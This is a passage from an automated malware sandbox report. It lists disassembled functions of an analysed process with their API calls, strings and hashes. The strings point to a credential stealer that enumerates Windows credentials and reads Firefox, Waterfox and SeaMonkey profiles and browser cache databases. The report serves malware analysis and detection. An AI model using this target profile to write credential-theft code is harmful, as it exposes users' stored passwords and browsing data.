                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                  • wcslen.MSVCRT ref: 0040BE06
                  • _wcsncoll.MSVCRT ref: 0040BE38
                  • memset.MSVCRT ref: 0040BE91
                  • memcpy.MSVCRT ref: 0040BEB2
                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                  • wcschr.MSVCRT ref: 0040BF24
                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                  • String ID:
                  • API String ID: 3191383707-0
                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00403CBF
                  • memset.MSVCRT ref: 00403CD4
                  • memset.MSVCRT ref: 00403CE9
                  • memset.MSVCRT ref: 00403CFE
                  • memset.MSVCRT ref: 00403D13
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 00403DDA
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Waterfox$Waterfox\Profiles
                  • API String ID: 3527940856-11920434
                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00403E50
                  • memset.MSVCRT ref: 00403E65
                  • memset.MSVCRT ref: 00403E7A
                  • memset.MSVCRT ref: 00403E8F
                  • memset.MSVCRT ref: 00403EA4
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 00403F6B
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                  • API String ID: 3527940856-2068335096
                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00403FE1
                  • memset.MSVCRT ref: 00403FF6
                  • memset.MSVCRT ref: 0040400B
                  • memset.MSVCRT ref: 00404020
                  • memset.MSVCRT ref: 00404035
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 004040FC
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                  • API String ID: 3527940856-3369679110
                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                  • API String ID: 3510742995-2641926074
                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                  • memset.MSVCRT ref: 004033B7
                  • memcpy.MSVCRT ref: 004033D0
                  • wcscmp.MSVCRT ref: 004033FC
                  • _wcsicmp.MSVCRT ref: 00403439
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                  • String ID: $0.@
                  • API String ID: 3030842498-1896041820
                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                  Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 2941347001-0
                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00403C09
                  • memset.MSVCRT ref: 00403C1E
                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                  • wcscat.MSVCRT ref: 00403C47
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                  • wcscat.MSVCRT ref: 00403C70
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcscat$Closewcscpywcslen
                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                  • API String ID: 3249829328-1174173950
                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040A824
                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                  • wcscpy.MSVCRT ref: 0040A854
                  • wcscat.MSVCRT ref: 0040A86A
                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 669240632-0
                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                  Download Yara Rule
                  APIs
                  • wcschr.MSVCRT ref: 00414458
                  • _snwprintf.MSVCRT ref: 0041447D
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                  • String ID: "%s"
                  • API String ID: 1343145685-3297466227
                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                  Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProcessTimes
                  • String ID: GetProcessTimes$kernel32.dll
                  • API String ID: 1714573020-3385500049
                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004087D6
                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                  • memset.MSVCRT ref: 00408828
                  • memset.MSVCRT ref: 00408840
                  • memset.MSVCRT ref: 00408858
                  • memset.MSVCRT ref: 00408870
                  • memset.MSVCRT ref: 00408888
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                  • String ID:
                  • API String ID: 2911713577-0
                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp
                  • String ID: @ $SQLite format 3
                  • API String ID: 1475443563-3708268960
                  • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                  • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                  Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                  • memset.MSVCRT ref: 00414C87
                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                  • wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressCloseProcVersionmemsetwcscpy
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 2705122986-2036018995
                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 1579243037-1578091866
                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040E60F
                  • memset.MSVCRT ref: 0040E629
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Strings
                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                  • API String ID: 3354267031-2114579845
                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                  • LockResource.KERNEL32(00000000), ref: 004148EF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: only a single result allowed for a SELECT that is part of an expression
                  • API String ID: 2221118986-1725073988
                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                  Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNEL32(00000064), ref: 004175D0
                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotificationSleep
                  • String ID: }A
                  • API String ID: 1821831730-2138825249
                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
